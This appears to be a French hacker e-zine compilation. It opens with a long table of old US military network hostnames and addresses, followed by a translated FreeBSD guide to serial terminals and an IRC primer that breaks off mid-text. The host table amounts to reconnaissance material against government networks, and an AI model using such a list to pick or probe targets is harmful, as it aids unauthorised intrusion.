wright-pat-piv-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47       amis.af.mil ami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47      c-17igp.af.mil c-17igp.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47      extender.afit.af.mil afitne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47      logair-gw.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31.226.1    logair-gw.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47      wpafb-info5.af.mil wpafb-info5.arpa wpafb-info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1.0.47      wpafb-fdl.af.mil wpafb-fd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2.0.47      lognet2.af.mil lognet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12.64.2     lognet2.af.mil lognet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48       kirtland.mt.ddn.mil kirtland-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48       ddnvx2.afwl.af.mil afwl-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9.238.32.36   ddnvx2.afwl.af.mil afwl-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48       dna-field-command.dca.mil dna-field-comman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48       ddnvx1.afwl.af.mil afw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9.238.32.2    ddnvx1.afwl.af.mil afw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48       dna-cafrm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48       kirtland-piv-rjets.af.mil kirtland-piv-rjet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48       hqafosp.af.mil hqafosp.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48      afotec2.af.mil afotec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48      cannon-piv-1.af.mil cannon-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49       ddn3.dca.mil ddn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49       ncpds-argenti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49       devens-emh1.army.mil usaisd-aim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49       mtf-pease.af.mil mtf-peas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49      devens-asims.army.mil asims-02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49      loring-piv-1.af.mil loring-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49      submept.navy.mil submepp.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50       alexandria.mt.ddn.mil darcom-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50       alexandria-emh2.army.mil ari-hq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50       alexandria-emh1.army.mil amc-hq.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50       alexandria-emh3.army.mil pyramid-am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50       alexandria-mil80.army.mil mil-80-per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50       cafrm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50       washington-asims.army.mil asims-rdcw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50       asims-dpcb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50      moc120.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50      radmis-on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50      fmpmis.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0.50      alexandria-emh4.army.mil usadhq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1.0.50      etl.army.mil et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2.0.50      alexandria-emh5.army.mil amc-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51       randolph2.mt.ddn.mil randolph2-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51       randolph-piv-1.af.mil randolph-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51       san-antonio-piv-2.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51       afmpc1.af.mil afmpc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51       afmpc3.af.mil afmpc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51      mtf-kelly.af.mil mtf-kell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51      ddp1.af.mil ddp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51      randolph-piv-3.af.mil randolph-piv-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52       randolph3.mt.ddn.mil randolph3-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52       camnet-randolph-r01.af.mil camnet-randolph-r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52       sam-housto-darms.army.mil darms-7.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52       san-antonio-piv-1.af.mil san-antonio-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52      randolph2-pc3.af.mil randolph2-pc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52      mtf-bergstrom.af.mil mtf-bergstro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52      afmpc-10.af.mil afmpc-10.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52      randolph-pc3.af.mil randolph-pc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52      bergstrm-am1.af.mil bergstrm-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53       uv6.eglin.af.mil afsc-a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53       eglin.mt.ddn.mil afsc-ad-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53       tyndall-am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53       uv4.eglin.af.mil eglin-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53       ntsc-pe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53      netpmsa-pens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53      penndc.navy.mil pennd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158      penndc.navy.mil pennd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53      hrlbrtfd-am1.af.mil hrlbrtfd-am1.arpa camnet-hurl-r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53      camnet-hurl-r02.af.mil camnet-hurl-r0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53      eglin-am1.af.mil eglin-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53      wims-tyn1.af.mil wims-tyn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54       detrick.mt.ddn.mil detrick-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54       ilcn-detrick.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54       ritchie-perddims.army.mil perddims3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54       detrick-emh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54       detrick-hsc.army.mil hsc-detrick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54       letterkenn-emh1.army.mil lead-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54      detrick-hsc2.army.mil hsc-detrick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54      mipca.navy.mil pa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54      alexandria-onet.army.mil absalex-emh.army.mil abs-ale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55       sheridan-mil801.army.mil mil-80-sher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55       sheridan-mil802.army.mil mil-80-sher56.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55       sperblomn.dca.mil sperblom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55      dcri.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38       dcri.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55      xenurus.gould.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55      crane-emh1.army.mil caa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55      indinpls.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55      wurtsmith-piv-1.af.mil wurtsmith-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9.0.55      mcs.anl.gov anl-mc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57       dockmaster.ncsc.mil dockmaster.dca.mil dockmaste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58       hanscom-piv-1.af.mil hanscom-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58       wva-emh1.army.mil wva-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58      supshipbrookly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59       scott.mt.ddn.mil scott-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59       macisin-ii.af.mil macisin-ii.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59      hqmac-gdss.af.mil hqmac-gd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59      macisin-i.af.mil macisin-i.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59      acfp-dev.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60       monmouth.mt.ddn.mil monmouth-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60       cecom-2.arpa monmouth-emh2.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60       monmouth-perddims.army.mil perddims28.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60       dix-perddims.army.mil perddims26.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60       ftmonmth-mepr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60      bayonne-autostrad.army.mil autostrad-ba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58      bayonne-autostrad.army.mil autostrad-ba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60      navwepstaearl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60      mcguire-piv-2.af.mil mcguire-piv-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60      dover-piv-2.af.mil dover-piv-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60      monmouth-emh1.army.mil network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60      cecom-3.arpa monmouth-emh3.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61       saint-louis.mt.ddn.mil stlouis-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61       st-louis-emh3.army.mil avsco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61       dmaac.dma.mil dmaacga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61       st-louis-avnmam.army.mil dasp75.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61       stlouis-ignet.army.mil st-louis-ignet.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61      whiteman-piv-1.af.mil whiteman-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61      stlouis-ignet2.army.mil st-louis-ignet2.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61      simastl.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35.148.1    simastl.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9.0.61      st-louis-emh4.army.mil stl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62       roberts.mt.ddn.mil roberts-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62       navmeducalemoor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62       vandenberg-am1.af.mil vandenberg-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62       lemnaf.navy.mil lemnaf.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135      lemnaf.navy.mil lemnaf.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62      roberts-emh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63       el-segundo2.mt.ddn.mil elsegundo-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63       afsc-sdx.af.mil afsc-sd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63       navmeducalongbeac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63       dava1.af.mil dava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63       lbns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41.202.2    lbnsy.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63       jpl-gdss.af.mil jpl-gd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63      la-pacdpinet.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63      mtf-mather.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63      navshipyd-longbeac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63      supship-long-beac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63      van-nuys-dmins.dla.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63      elsegundo-dmins.dla.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63      losalmts-darm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64       robins.mt.ddn.mil robins-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64       ftmcpherson-ignet.army.mil forscom-ignet.army.mil igmirs-fors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64       gillem-mil80.army.mil mil-80-2bd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64       wr-hits.af.mil wr-hit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64      snag-wr.af.mil snag-w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64      ftgillm-ignet.army.mil igmirs-ftgillm.army.mil igmirs-ftgillm.a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64      robinsmdss.af.mil robinsmd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64      robins-piv-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65       el-segundo.mt.ddn.mil elsegundo2-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65       aerospace.aero.org aero.or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5.9.3       aerospace.aero.org aero.or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30.221.192.10  aerospace.aero.org aero.or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65       jpl-mil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28.1.13.0      jpl-mil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65      dcrl.dla.mil dcr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230     dcrl.dla.mil dcr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0.65      afsc-ssd.af.mil afsc-sd.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66       afg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66       hanscom.mt.ddn.mil afgl-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66       eastlonex.radc.af.mil radc-eastlone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66       gtewis.af.mil gtewi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66       gw2.hanscom.af.mil esd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66      afgl-vax.af.mil afgl-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66      drcvax.af.mil drc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66      hanscom-am1.af.mil hanscom-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9.0.66      supship-bath.navy.mil supship-bat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67       andrews.mt.ddn.mil afsc-hq-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67       afsc-hq.arpa afsc-hq.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67       hqafsc-vax.af.mil hqafsc-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67       mqg.dca.mil mqg.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67       indianhead.nswc.navy.mil nswc-i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67      ftmeade-darms.army.mil meade-darms.army.mil darms-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67      navsea-331.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67      alexandria-ignet1.army.mil igmirs-cidc.army.mil igmirs-cid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67      hqafsc-lons.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67      alexandria-ignet.army.mil igmirs-darco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67      navsea-pms313.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67      andrews-piv-1.af.mil andrews-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69       abrams2.mt.ddn.mil abrams2-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69       frankfurt-asims.army.mil fra-asim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69       hanau-emh1.army.mil email-hanau.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69       aschaffenb-emh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69      frankfurt-ignet2.army.mil fra-ignet.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69      dar-ignet.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69      euraaa.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70       cmsc.dca.mil cms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70       dcaoc2.mt.ddn.mil dcaoc2-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70       washngtn-mepr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70       anacostia-onet.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70       navyyard-onet.nav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9.0.70      ddntrouble.dca.mil ddntroubl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71       okc-uni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71       ftsill-ignet.army.mil sill-ignet.army.mil igmirs-sill-ig.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71       tinker.mt.ddn.mil tinker-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71       satod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71       tinkermdss.af.mil tinkermd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71       ccso-vax.af.mil ccso-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31.18.3.1      ccso-vax.af.mil ccso-vax.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71      oc1.af.mil oc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71      ocdis0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71      aflc-oc-aisg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71      apsd-ii-os062.af.mil apsd-ii-os06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71      tinker-piv-1.af.mil tinker-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71      chaffe-tcacci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72       ddn-shadow-mc.dca.mil ddn-shadow-m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72       ilcn-natick.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72       ddn2.dca.mil ddn.dca.mil ddn2.arpa dd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72       inmet.inmet.com inmet.com ddn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72       devens-perddims.army.mil perddims19.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72       watertown-emh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72       x25test.dca.mil x25tes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72       dcrb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58       dcrb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72      nsyptsmh-poe.arpa nsyportsmouth.arpa nysportsmout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26.20.2     nsyptsmh-poe.arpa nsyportsmouth.arpa nysportsmouth.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72      loring-am1.af.mil loring-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72      pease-am1.af.mil pease-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72      natick-emh1.army.mil natick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73       sri-nic.arpa nic.ddn.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0.0.0.51       sri-nic.arpa nic.ddn.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73       menlo-park.mt.ddn.mil sri-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73       twg.com twg.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74       white-sands.mt.ddn.mil whitesands-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74       wsmr-simtel20.army.mil simtel20.arpa simtel20.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74       ftbliss-ignet.army.mil bliss-ignet.army.mil igmirs-ftblis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74       holloman-am1.af.mil holloman-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74       bliss-perddims.army.mil perddims0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74      wsmr-emh99.army.mil traps-wsm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74      bliss-ato.army.mil bliss-at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75       yuma.mt.ddn.mil yuma-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75       luke-piv-3.af.mil luke-piv-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75       nellis-piv-1.af.mil nellis-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75      mtf-nellis.af.mil mtf-nelli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76       dca-ems.dca.mil dca-ems.arpa dcem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76       dcaoc.mt.ddn.mil dcaoc-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76       deers-alexandri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76       oahost.dca.mil oahos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76       belvoir-ignet2.army.mil igmirs-corpeng.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76      pentagon-bcn.army.mil pentagon-bc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92.31.75.235   pentagon-bcn.army.mil pentagon-bc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76      conus-milnetmc.dca.mil conus-milnetm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76       conus-milnetmc.dca.mil conus-milnetm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77       zama.mt.ddn.mil zama-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77       zama-ignet.army.mil ignet-cpzam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77       yokota-piv-1.af.mil yokota-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77       misawa-piv-1.af.mil misawa-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77      zama-pacdpine.army.mil pacdpinet-zam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77      mtf-misawa.arpa mtf-misawa.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77      ncpds-iwakuni.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77      nsdyok.arpa yokns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77      nsdyok.arpa yoknsd.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77      ida-fms-yokosuk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77      poj-har.army.mil poj-ha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77      zama-emh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9.0.77      cpzama-jacs6350.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78       puget-sound.mt.ddn.mil pugetsound-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78       peracv.navy.mil peracv.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78       navhospbrem.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78       navmeducabremerto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78       navmeducaoakharbo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78      lewis-asims.army.mil asims-020.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79       benning.mt.ddn.mil benning-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79       benning-ato.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79       benning.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79       benning-tcacci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79      mcdn-alb.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79      mtf-maxwell.af.mil mtf-maxwel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79      benning-jacs5074.army.mil jacs507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79      columbus-am1.af.mil columbus-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79      camnet-columbus-r02.af.mil camnet-columbus-r0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79      gunter-am1.af.mil gunter-am1.arpa camnet-gunt-r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79      benning-perddims.army.mil perddims3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9.0.79      benning-mepr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79      ftgillem-darm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5.0.79      ftmcphsn-jacs5073.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1.0.79      benning-asims.army.mil asims-034.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80       bragg.mt.ddn.mil bragg-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4.0.80       tecnet-clemson.arpa tecnet-clemson.jcte.jcs.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80       nardac-cherryp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80       chrns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80       chrns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80       ed-mb.af.mil ed-mb.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80       netpmsa-charl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80      ftbragg-asatms.army.mil bragg-asatm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80      navmeducacharleston.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80      mcdn-clb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80      bragg-asim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4.0.80      jackson-jacs5056.army.mil jackson-jac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80      cptma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80      navmeducalejeune.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7.0.80      navmeducacherryp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80      bragg-jacs5072.army.mil bragg-jacs.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9.0.80      ftbragg-ignet.army.mil bragg-ignet.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4.0.80      pope-piv-1.af.mil pope-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5.0.80      ftbragg-ignet2.army.mil bragg-ignet2.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6.0.80      ftbragg-ignet3.army.mil bragg-ignet3.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0.80      bragg-emh1.army.mil bragg.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1.0.80      bragg-perddims.army.mil perddims10.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81       carderock.mt.ddn.mil david-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81       dtrc.dt.navy.mil dtr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30.46.1.3      dtrc.dt.navy.mil dtr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81       dmacsc.dma.mil dmaodshost.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81       hqaaa.army.mil hqaa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81      nardacdc002.arpa dcmail.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0.81      wrair-emh1.army.mil ilcn-wreed.arpa wrai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82       buckner.mt.ddn.mil buckner-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82       navmeducaokinaw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82       ncpds-butle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82       kadena-piv-1.af.mil kadena-piv-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82       kadena-c01.af.mil kadena-c0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82       kadena-c02.af.mil kadena-c0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82      mtf-kadena.af.mil mtf-kadena.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82      kadena-am2.af.mil kadena-am2.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82      sac-misc3.af.mil sac-misc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8.0.82      buckner-emh1.army.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0.0.83       robins2.mt.ddn.mil robins2-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5.0.83       wr1.af.mil wr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6.0.83       wrdis01.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7.0.83       edcars-wr.af.mil edcars-w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8.0.83       aflc-wr-aisg1.af.mil aflc-wr-aisg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9.0.83       dmmis-wr.af.mil dmmis-wr.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0.0.83      robins-am1.af.mil robins-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1.0.83      kngtrf.navy.mil kngtrf.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205     kngtrf.navy.mil kngtrf.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2.0.83      moody-am1.af.mil moody-am1.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3.0.83      robins-piv-2.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5.0.83      robins-pc3.af.mil robins-pc3.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16.0.83      remis-wr.af.m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2.0.84       dahlgren.mt.ddn.mil nswc-mil-tac.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26.3.0.84       oas.nswc.navy.mil nswc-oas.arp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of-)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nXo/loteknologi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Je ne sais pas de quand date ce texte, mais les IP doivent avoir changés. certains urls en revanche, non.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Le terminal X, par Clad Strif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ntroduction (courte): vous pensez bien que je ne tire pas ces connaissances sur les terminaux, de l'endroit béni d'où je suis né. Alors merci à freebsd pour leu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xplications on ne peut plus clair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ermin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ntribution de Sean Kelly &lt;kelly@fsl.noaa.gov&gt;28 Juillet 1996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tiliser des terminaux est une solution commode et peu coûteuse pour disposer de la puissance de votre système FreeBSD lorsque vous n'êtes pas sur la console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ordinateur ou sur un réseau auquel il est connecté. Cette section vous explique comment utiliser des terminaux avec FreeBS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sages et types de termin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premiers systèmes Unix n'avaient pas de console. Au lieu de cela, les gens ouvraient des sessions et exécutaient leurs programmes à partir de terminaux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étaient connectés aux ports série de l'ordinateur. C'est un peu la même chose que lorsque l'on utilise un modem et un logiciel d'émulation de terminal pour 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nnecter à un système distant et travailler en mode tex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PCs d'aujourd'hui ont des consoles graphiques de haute résolution, mais la possibilité d'ouvrir une session sur un port série subsiste toujours sur presque tous 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ystèmes d'exploitation de type Unix; FreeBSD ne fait pas exception à la règle. Avec un terminal relié à un port série disponible, vous pouvez ouvrir une session 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xécuter des programmes comme vous le feriez normalement à la console ou dans une fenêtre xterm avec le gestionnaire X Window.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our un usage professionnel, vous pouvez connecter de nombreux terminaux à un système FreeBSD et les installer sur les bureaux de vos employés. Pour une usa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omestique, un ordinateur inutilisé, un vieux PC ou Macintosh, peut servir de terminal sur un ordinateur plus puissant sous FreeBSD. Vous pouvez ainsi faire de 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i serait sinon un système mono-utilisateur un puissant système multi-utilisateu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reeBSD connaît trois types de termin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Terminaux passif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PCs servant de termin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Terminaux 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sections qui suivent décrivent chacun de ces types de termin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erminaux passif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terminaux passifs sont des matériels spécialisés qui vous permettent de vous connecter à votre ordinateur via une ligne série. On les appelle ``passifs'' parce qu'il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e savent qu'afficher, envoyer et recevoir du texte. Ils ne peuvent pas exécuter de programmes. C'est l'ordinateur auquel ils sont connectés qui dispose de tout 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il faut pour faire tourner les logiciels de traitement de texte, les compilateurs, la messagerie électroniques, les jeux, et ainsi de sui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l ya a des centaines de modèles de terminaux passifs de constructeurs différents, dont le VT-100 de Digital Equipment Corporation et le WY-75 de Wyse. Il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onctionneront pratiquement tous avec FreeBSD. Certains terminaux haut de gamme peuvent même afficher des graphiques, mais seuls certains logiciels tireront part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ces possibilités évolué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terminaux passifs sont d'usage courant lorsque les utilisateurs n'ont pas besoin d'accéder à des outils graphiques tels que ceux que fournit le système X Window.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Cs servant de termin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un terminal passif ne sait qu'afficher, envoyer et recevoir du texte, alors n'importe quel ordinateur personnel inutilisé peut servir de terminal passif. Il vous faudr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niquement le câble adapté et un programme d'émulation de terminal qui tourne sur cet ordinat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st un usage domestique courant. Si votre femme travaille sur votre console système FreeBSD, vous pouvez travailler en mode texte en même temps à partir d'u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achine moins puissante connectée comme terminal à votre système FreeBS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erminaux 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terminaux X sont les terminaux les plus sophistiqués, ils ne se connectent pas à un port série, mais habituellement à un réseau du type Ethernet. Au lieu d'ê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antonnés au mode texte, ils peuvent afficher des applications X Window.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terminaux X ne sont cités ici que pour être exhaustif. Ce chapitre ne décrit pas comment installer, configurer et utiliser des terminaux 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âbles et Por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our relier un terminal à votre système FreeBSD, il vous faut le bon câble et un port série auquel le connecter. Cette section vous explique comment faire. Si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avez déjà comment brancher votre terminal et quel type de câble il vous faut, passez à la section Configur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âbl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me les terminaux utilisent les ports série, il vous faudra un câble série - appelé aussi RS-232C - pour relier le terminal à votre système FreeBS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l y a deux sortes de câbles série. Celui que vous utiliserez dépendra du type de terminal que vous voulez connect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vous connectez un ordinateur personnel pour servir de terminal, utilisez un câble ``null-modem''. Un câble ``null-modem'' relie deux ordinateurs ou deux termina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ntre e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vous avez un vrai terminal, la meilleure source d'information pour savoir quel câble utiliser est la documentation du terminal. Si vous n'avez pas de documenta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ssayez un câble ``null-modem''. Si cela ne marche pas, alors essayez avec un câble standar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l faudra aussi que les ports série de votre terminal et de votre système FreeBSD aient des connecteurs compatibles avec le câble que vous utilise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âbles ``Null-mode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câble ``null-modem'' transmet directement certains signaux, le ``signal à la terre'', par exemple, mais en permute d'autres, les broches ``émission'' et ``récep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ont par exemple reliées entre elles, d'une extrémité sur l'aut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vous réalisez vous-même vos propres câbles, voici une table qui décrit la méthode recommandée pour fabriquer un câble ``null-modem'' pour les terminaux. Cet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able donne les noms et les numéros de broches des signaux RS-232C sur un connecteur DB-25,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gnal  Broche #     Broche #  Sig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xD  2  reliée à  3  Rx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xD  3  reliée à  2  Tx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TR  20  reliée à  6  DS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SR  6  reliée à  20  DT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G  7  reliée à  7  S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CD  8  reliée à  4  RTS [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TS  4     5  C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TS  5  reliée à  8  DC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emarqu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 reliez les broches 4 et 5 entre elles sur le connecteur et à la broche 8 de l'autre extrémité (côté ordinat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âbles RS-232C standar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câble série standard transmet directement les signaux RS-232C. Ce qui signifie que la broche ``émission'' d'une extrémité est reliée à la broche ``émission''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autre. C'est le câble que l'on utilise pour connecter un modem à un système FreeBSD, et dont ont besoin certains termin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r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ports série sont les périphériques grâce auxquels l'information est échangée entre le terminal et l'ordinateur FreeBSD hôte. Cette section décrit les différents typ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ports série existant et comment ils sont adressés par FreeBS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ypes de por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l y a différents types de ports série. Avant d'acheter ou de monter un câble, vous devez vérifier qu'il soit adapté aux ports de votre terminal et de votre machi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reeBS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plupart des terminaux ont des ports DB25. Les ordinateurs personnels, dont les PCs sous FreeBSD, ont des ports DB25 ou DB9. Si vous avez une car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ulti-ports série sur votre PC, vous pouvez avoir des ports RJ-12 ou RJ-45.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nsultez la documentation de votre matériel pour connaître les spécifications des ports que vous allez utiliser. Un coup d'oeil aux ports suffit souvent auss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oms des por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vec FreeBSD, vous accédez à chacun des ports série par une entrée dans le répertoire /dev. Il y a deux sortes d'entré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ports d'appel entrant sont appelés /dev/ttydX où X est le numéro du port, à partir de zéro. Vous utilisez habituellement les ports d'appel entrant pour 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erminaux. Avec ces ports, la ligne série doit émettre le signal ``Data Carrier Detect'' (DCD) - détection de porteuse - pour qu'ils fonctionne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ports d'appel sortant sont appelés /dev/cuaaX. Vous n'utilisez normalement pas les ports d'appel sortant pour les terminaux, mais pour les modems.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uvez les utiliser avec un terminal, si le câble série ou le terminal ne supportent pas le signal de détection de porteu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eportez-vous aux pages de manuel de sio(4) pour plus d'informa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vous connectez un terminal au premier port série (COM1 en langage DOS), vous utiliserez alors /dev/ttyd0 pour faire référence au terminal. S'il est sur le seco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rt série (aussi appelé COM2), ce sera /dev/ttyd1, et ainsi de sui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otez bien que vous devrez peut-être configurer votre noyau pour y inclure le support de chaque port série, en particulier si vous avez une carte série multi-por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yez le chapitre Configurer le noyau de FreeBSD pour plus d'informa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nfigur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tte section décrit ce que vous devez faire pour configurer votre système FreeBSD pour pouvoir ouvrir une session depuis un terminal. Elle suppose que vous av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éjà configuré votre noyau pour y inclure le support du port série auquel votre terminal est connecté - et que vous avez branché ce derni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n un mot, vous devez demander au programme init, qui contrôle le lancement et l'exécution des processus, de lancer un processus getty, lequel se chargera de lire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om d'utilisateur au début de la session et lancera à son tour le programme logi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ur cela, vous devez éditer le fichier /etc/ttys. Commencez par utiliser su pour devenir super-utilisateur. Modifiez ensuite de la façon suivante /etc/tty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joutez à /etc/ttys une ligne pour l'entrée du répertoire /dev correspondant au port série, si elle n'y est pas déjà.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récisez qu'il faut exécuter /usr/libexec/getty sur ce port et donnez le type de ``getty'' approprié, tel qu'il est défini dans le fichier /etc/gettytab.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onnez le type de terminal par défa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ctivez le port avec ``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ndiquez si le port doit être ``secu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aites relire le fichier /etc/ttys par ini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n option, vous pouvez définir un type de getty sur-mesure pour l'étape 2 en ajoutant une entrée au fichier /etc/gettytab. Ce document ne vous explique pas com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 faire. Vous êtes invités à consulter les pages de manuel de gettytab(5) et getty(8) pour plus d'informa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sections qui suivent détaillent chacune de ces étapes, Dans l'exemple que nous prendrons pour cela, nous connecterons deux terminaux à notre système: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yse-50 et un vieil IBM PC 286 avec un logiciel d'émulation de terminal compatible VT-100. Nous connecterons le terminal Wyse au second port série et le 286</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u sixième port série (sur une carte multi-por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ur plus d'informations sur le fichier /etc/ttys, lisez les pages de manuel de ttys(5).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jouter une entrée à /etc/tty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devez d'abord ajouter une entrée au fichier /etc/ttys, à moins qu'il n'y en ait déjà u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fichier /etc/ttys liste tous les ports de votre système FreeBSD sur lesquels vous voulez autoriser l'ouverture de session. Par exemple, la première console virtue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tyv0 a une entrée dans ce fichier. Vous pouvez ouvrir une session à la console en utilisant cette entrée. Il y a des entrées dans le fichier pour les consoles virtuel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ports série et les ``pseudo-tty''s. Pour les terminaux physiques, n'indiquez que l'entrée /dev du port série, sans le ``/dev/''.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 l'installation de votre système FreeBSD, le fichier /etc/ttys contient les entrées pour les quatre premiers ports série: de ttyd0 à ttyd3. Si vous connectez un termina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à l'un de ces ports, vous n'avez pas d'entrée à ajout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ns notre exemple, le Wyse-50 va sur le second port série, ttyd1, qui est déjà dans le fichier. Il nous suffit d'ajouter une entrée pour le PC 286 relié au sixième po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érie. Voici un extrait du fichier /etc/ttys après que nous ayons ajouté cette nouvelle entré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tyd1   "/usr/libexec/getty std.9600"   unknown off secu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tyd5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éfinir le type de getty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ous devons ensuite préciser quel est le programme à exécuter pour gérer les ouvertures de session depuis le terminal. Le programme standard de FreeBSD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ela est /usr/libexec/getty. C'est lui qui affiche l'invite logi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programme getty a un argument (optionnel), le type de getty. Un type de getty décrit les caractéristiques de la ligne sur laquelle est le terminal, telle sa vitesse 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ps et le type de contrôle de parité utilisé. le programme getty lit ces caractéristiques dans le fichier /etc/gettytab.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fichier /etc/gettytab contient un grand nombre d'entrées pour des terminaux anciens et d'autres plus récents. Dans presque tous les cas, les entrées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ommencent par std fonctionneront avec les terminaux physiques. Ces entrées ignorent le contrôle de parité. Il y a un entrée std pour chaque vitesse en bps de 110 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15200. Vous pouvez bien entendu ajouter vos propres entrées à ce fichier. Les pages de manuel de gettytab(5) vous donnent plus d'informa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and vous définissez le type de getty dans le fichier /etc/ttys, vérifiez que les paramètres de communication du terminal soient les mêm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ns notre exemple, le Wyse-50 n'utilise pas de contrôle de parité et se connecte à 38400 bps. Le PC n'utilise pas de contrôle de parité et se connecte à 19200</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ps. Voici le fichier /etc/ttys avec les définitions correspondantes (juste ce qui concerne les deux terminaux qui nous intéresse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tyd1   "/usr/libexec/getty std.38400"   unknown off secu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tyd5   "/usr/libexec/getty std.19200"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marquez que le second champ - celui qui indique quel programme exécuter - est entre guillemets. C'est important, parce que sans cela le type donné en argu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getty serait interprété comme troisième cham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éfinir le type de terminal par défa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troisième champ du fichier /etc/ttys donne le type de terminal par défaut sur le port. Pour les ports d'appel entrant, vous y mettez typiquement ``unknow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nconnu - ou dialup - appel - parce que les utilisateurs peuvent s'y connecter avec n'importe quel type de terminal ou de logiciel. Pour les terminaux physiques, le typ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terminal ne varie pas, vous pouvez donc indiquer un vrai type de terminal dans ce cham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abituellement, les utilisateurs emploient le programme tset depuis leur fichier .login ou .profile pour récupérer le type de terminal et demander de le préciser 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écessaire. En définissant le type de terminal dans le fichier /etc/ttys, vous leur évitez qu'on leur pose cette ques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our savoir quels types de terminaux sont reconnus par FreeBSD, consultez le fichier /usr/share/misc/termcap. Il liste environ 600 terminaux. Vous pouvez en ajout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 vous le désirez. Voyez les pages de manuel de termcap(5) pour plus d'informa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ns notre exemple, le Wyse-50 est un terminal de type Wyse-50 (bien qu'il puisse émuler d'autres types de terminaux, nous le laisseront en mode Wyse-50).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C 286 PC utilise Procomm qui sera configuré pour émuler une VT-100. Voici les entrées adéquates, quoiqu'encore incomplètes du fichier /etc/tty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tyd1   "/usr/libexec/getty std.38400"   wy50  off secu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tyd5   "/usr/libexec/getty std.19200"   vt100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ctiver le por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champ suivant de /etc/ttys, le quatrième, indique s'il faut activer le port. Si vous y mettez on, alors le processus init démarrera le programme mentionné par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cond champ, getty, qui affichera l'invite de session. Si vous y mettez off, il n'y aura pas de getty, et donc pas d'ouverture de session sur le por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devez donc bien sûr préciser on dans ce champ. Voici de nouveau le fichier /etc/ttys. Nous avons activé les deux ports avec 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tyd1   "/usr/libexec/getty std.38400"   wy50  on secu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tyd5   "/usr/libexec/getty std.19200"   vt100 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éfinir les ports sécurisé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ous voici arrivé au dernier champ (enfin, presque: il y a un indicateur window optionnel, mais nous ne nous en préocupperons pas). Le dernier champ indique si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rt est sécuris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e veut dire ``sécuris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la veut dire que le compte super-utilisateur (ou tout compte avec un IDentifiant utilisateur de 0) peut ouvrir une session sur ce port. Les ports non-sécurisé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autorisent pas l'ouverture de session super-utilisat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ment utiliser les ports sécurisés et non sécurisé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orsqu'un port est non sécurisé, le terminal qui y est connecté n'autorise pas l'ouverture de session super-utilisateur. Les gens qui connaissent le mot de pas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uper-utilisateur de votre système FreeBSD devront d'abord se connecter sous un compte utilisateur ordinaire. Ils devront ensuite utiliser la commande su pour a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droits du super-utilisat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râce à cela, vous aurez deux enregistrements pour pouvoir repérer les accès super-utilisateur illégitimes: les deux commandes login et su rapportent leur emploi da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 fichier de trace système (les ouvertures de sessions sont aussi enregistrées dans le fichier wtm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orsque le port est sécurisé, l'ouverture de session super-utilisateur est autorisée depuis le terminal. Les gens qui connaissent le mot de passe super-utilisat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euvent directement se connecter en tant que tel. Vous n'avez plus les traces potentiellement utiles de l'ouverture de session et de l'utilisation de s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e devez-vous utilis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tilisez ``non sécurisé''. Utilisez ``non sécurisé'' même pour les terminaux qui ne sont pas accessibles à tout le monde ou sont dans des locaux fermés à clé. Il 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acile d'ouvrir une session et d'utiliser su quand vous avez besoin des droits du super-utilisat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ici finalement les entrées complètes du fichier /etc/ttys accompagnées d'un commentaire qui indique où se trouvent les termin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tyd1   "/usr/libexec/getty std.38400"   wy50  on insecure # Cuisi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tyd5   "/usr/libexec/getty std.19200"   vt100 on insecure # Salle de bai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bliger init à relire le fichier /etc/tty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and vous démarrez FreeBSD, le premier processus, init, lit le fichier /etc/ttys et démarre les programmes listés pour chacun des ports activés, pour afficher l'inv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sess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près avoir modifié /etc/ttys, vous aimeriez ne pas avoir à redémarrer le système pour qu'init voit vos modifications. C'est pourquoi init relit /etc/ttys lorsqu'il reçoit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gnal SIGHUP (``hang up'' - raccroch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onc, après avoir sauvegardé vos modifications au fichier /etc/ttys, envoyez un SIGHUP à init en tap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 kill -HUP 1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 processus init a toujours l'IDentifiant de processus 1.)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la configuration est correcte, les câbles en place, les terminaux sous tension, vous devriez voir les invites de session. Vos terminaux sont prêts à être utilisés pour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remière fo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égler les problèmes liés à votre connec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ême en ayant porté la plus méticuleuse attention aux détails, il peut toujours y avoir quelque chose qui ne va pas lorsque vous installez un terminal. Voici une liste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ymptômes et de suggestions de solu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invite de session n'apparaît pa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érifiez que le terminal est branché et sous tension. Si c'est un ordinateur personnel utilisé comme terminal, vérifiez qu'il utilise bien le logiciel d'émulation de termina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r le bon por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ssurez-vous que le câble est solidement raccordé sur le terminal et sur la machine FreeBSD. Vérifiez que c'est le bon type de câb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ontrôlez que le terminal et FreeBSD utilisent la même vitesse en bps et le même contrôle de parité. Si c'est un terminal vidéo, vérifiez que les contrôles de luminosit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t de contraste ne soient pas au minimum. Si c'est un terminal papier, vérifiez qu'il y ait du papier et de l'enc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érifiez qu'il y ait bien un processus getty qui s'exécute pour ce terminal. Tape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 ps -axww|grep getty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ur avoir la liste des processus getty actifs. Vous devriez voir une entrée pour le terminal. Par exemple, la ligne suivan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22189  d1  Is+    0:00.03 /usr/libexec/getty std.38400 ttyd1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ontre qu'il y a un getty qui s'exécute sur le port série ttyd1 et utilise l'entrée std.38400 de /etc/gettytab.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l n'y a pas de processus getty actif, assurez-vous que vous avez activé le port dans /etc/ttys. Avez-vous aussi bien exécuté kill -HUP 1?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l y a n'importe quoi à la place de l'invite de sess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érifiez que le terminal et FreeBSD définissent la même vitesse et le même contrôle de parité. Assurez-vous que le processus getty utilise le bon type de getty. Da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 cas contraire, corrigez /etc/ttys et exécutez kill -HUP 1.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caractères sont redoublés; le mot de passe s'affiche quand on le tap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ssez le terminal (ou le logiciel d'émulation de terminal) du mode ``half duplex'' ou ``echo local'' en mode ``full duplex''.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Dossier IRC, par Clad Strif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rc est un client de connection vers un serveur. Il va vous permettre de dialoguer en direct sur les channels de ce serveurs, qui se trouvent dans de nombreus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illes, pour une connection plus simple. Un canal IRC est aussi appelé un chan. Lorsqu'on arrive sur des chans il est tout de suite facile de voir qui est opérateur d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han, un "@" devant le nick, qui est voicé avec un "+" devant le nick, et qui est banni: y'a qu'à regarder la liste dans channel info.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ès son arrivé sur un chan il est tout de suite possible de savoir quel genre de types sont dessus. Si les mecs ont un nick écrit comme: PsYkAoS, Wz_Gate, __2</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tc... Z'êtes tombé sur un chan de lamers. dans tout les cas, la présence d'un topic est elle aussi déterminante sur la mentalité d'un cha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ur garder un chan il existe des bots: Bot est l'abréviation pour Robot. Un bot est donc en fait un logiciel. Ne vous étonnez donc pas s'il ne parle jamais (sauf</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and un op facétieux le fait parl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bot effectue des tâches de routine permettant le bon fonctionnement du canal. Il permet à l'op de se libérer d'obligations un rien contraignantes, et lui facil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également la vie lorsqu'il s'agit d'effectuer des actions rapid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xemple: un bot réagit beaucoup plus vite qu'un humain en cas de floo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achez qu'un bot utilise la bande passante pour huit utilisateurs, donc si tout le monde se 